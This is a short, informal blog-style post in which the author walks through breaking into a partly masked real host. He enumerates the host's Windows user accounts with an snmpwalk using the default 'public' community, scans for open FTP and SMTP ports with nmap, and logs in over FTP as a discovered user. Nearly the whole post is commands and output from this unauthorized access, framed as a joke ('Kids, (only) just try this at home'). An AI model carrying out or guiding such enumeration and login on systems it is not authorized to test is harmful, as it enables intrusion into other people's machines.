This is a simple scenario that would reveal :). Some machine has unconfigured SNMP, so a bad guy can "walk" it with an SNMP request for the OID to obtain the list of lanman users .. tadda
devil@venom ~ $ sudo snmpwalk -v 1 -c public 202.x.155.x OID
STRING: "Guest"
STRING: "ASPNET"
STRING: "angely"
STRING: "SQLDebugger"
STRING: "Administrator"
STRING: "TsInternetUser"
STRING: "IUSR_SCC-ZR574A805WI"
STRING: "IWAM_SCC-ZR574A805WI"
Got a username? Try some remote connection services,
devil@venom ~ $ nmap -vv 202.x.155.x -p 20-25 | grep open
Discovered open port 21/tcp on 202.x.155.x
Discovered open port 25/tcp on 202.x.155.x
21/tcp open ftp
25/tcp open smtp
devil@venom ~ $
The most common way: uname/passwd.. and tadda
devil@venom ~ $ ftp
ftp> o 202.x.155.x
Connected to 202.x.155.x(202.x.155.x).
220 ANGSRV Microsoft FTP Service (Version 5.0).
Name (202.x.155.x:devil): angely
500 'AUTH SSL': command not understood
SSL not available
331 Password required for angely.
Password:
230 User angely logged in.
Remote system type is Windows.
ftp> bye
221
Kids, (only) just try this at home. Yeah, well, it's just another daily boring "working" day,
new technique? not really... just lucky
images are property of http://www.sdm-net.org
Why does the snmpwalk need sudo?
*don't laugh, bro, "it's just out of habit :))" (from Ubuntu all the way to Gentoo)